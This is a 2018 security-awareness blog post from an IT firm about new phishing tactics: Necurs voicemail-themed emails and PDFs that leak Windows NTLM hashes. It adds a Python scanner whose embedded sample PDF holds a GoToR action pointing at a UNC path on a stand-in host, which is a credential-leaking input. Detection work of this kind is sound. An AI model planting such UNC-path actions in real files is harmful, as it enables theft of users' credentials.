New Tactics in Social Engineering

May 11, 2018 | Security

There’s a problem with combating social engineering style cyber-attacks. As soon as you understand all the methods that bad actors use… they develop new ones! But don’t let that fact dissuade you from appreciating the value of Security Awareness Training and proactive staff education. While phishing attacks continue to evolve and change, your firewalls and filters don’t necessarily adapt. According to KnowBe4, traditional email filters have a 10.5% failure rate. Educating your employees is truly the most effective way to fight against social engineering attacks.

KnowBe4 has identified a new technique, used by the world’s largest phishing botnet, which is both ingenious and dangerous. The Necurs botnet controls millions of machines and is used by criminal botmasters. One odd fact about the Necurs botnet is that it does not appear to affect computers that use Russian as a language. (You can make your own topical assumptions based on that information.) Their new social engineering method has the botnet send out emails that appear to be a legitimate notification of an unanswered call, with the voicemail attached. The attachment is an archive containing a .URL file, which traditional filters will not catch. The malicious payload is delivered when the voicemail is accessed, opening a zipped folder in the user’s browser. Would your employees know to avoid strange voicemails for fear of malware?

Another new social engineering tactic is even more nefarious. It doesn’t just deliver a malicious payload – it actually steals access to your organization. This tactic uses features natively found in the PDF standard to steal NTLM hashes. These hashes are the format in which Windows stores user credentials. What does that mean for you? If you open an affected PDF file, your Windows credentials can be stolen in about 15 seconds. That’s a BIG threat to your organization’s identity perimeter. PDF files are especially threatening since they are so often sent as attachments. This vulnerability was already known to exist within Office documents, Outlook, browsers, Windows shortcut files, and shared folders.

Luckily, this weakness was found by an ethical hacker named Assaf Baharav. He proved that two of the most popular PDF readers didn’t prevent the credential threat, and “highly suspects” others are just as vulnerable. He contends that “the best practice here is to follow Microsoft option security enhancement”, in addition to educating employees about the innate risks of certain file types.
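As an added illustration (not code from the original post or from Baharav’s research), here is a small Python scanner for the PDF trick described above: it flags PDF actions that reference an external file (/GoToR, /GoToE, /Launch) whose /F file specification is a UNC path, because that is what makes Windows open an SMB connection and offer NTLM credentials when the action fires. The sample PDF bytes and the 192.0.2.10 address are constructed for the example.

```python
import re

# Constructed sample (not a real malicious file): a tiny PDF whose GoToR action
# points its /F file specification at a UNC path. The \\\\ and \\ sequences are
# PDF string escapes, so the reader decodes them to \\192.0.2.10\share\doc.pdf.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /Type /Action /S /GoToR /F (\\\\192.0.2.10\\share\\doc.pdf) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF"""

# Benign control: same structure, but /F is a plain relative file name.
BENIGN_PDF = SAMPLE_PDF.replace(rb"(\\\\192.0.2.10\\share\\doc.pdf)", rb"(appendix.pdf)")

ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch)\b")      # actions that open another file
FILESPEC_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\()])*)\)")       # /F given as a literal string
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")                   # \\server\share or //server/share


def _unescape_pdf_string(raw: bytes) -> str:
    """Decode the PDF string escapes that matter here: \\\\ -> \\, \\( -> (, \\) -> )."""
    return re.sub(rb"\\([\\()])", rb"\1", raw).decode("latin-1")


def find_remote_file_actions(pdf: bytes) -> list[str]:
    """Return decoded /F file specs that point at a UNC path, scanning object by
    object so the action type and its /F entry are paired correctly."""
    hits = []
    for obj in re.findall(rb"\bobj\b(.*?)\bendobj\b", pdf, re.S):
        if not ACTION_RE.search(obj):
            continue
        for m in FILESPEC_RE.finditer(obj):
            spec = _unescape_pdf_string(m.group(1))
            if UNC_RE.match(spec):
                hits.append(spec)
    return hits


if __name__ == "__main__":
    for name, data in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(name, "->", find_remote_file_actions(data) or "no UNC file actions")
```

Real-world PDFs often keep their actions inside compressed object streams or hex strings, so a production check should run this logic over objects decoded by a proper PDF parser rather than over the raw bytes.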

These are just two examples. Social engineering tactics are, by their very nature, constantly evolving. As soon as you think you know all of the ways your information could be phished or how your computers could get ransomware, new strategies develop. Continuous Security Awareness Training is vital to stay ahead of those targeting your business. For an evaluation of your security environment, training for your employees, and defensive measures you can take to protect your business, contact Peters & Associates today! Call 630.832.0075 or email – we are happy to help!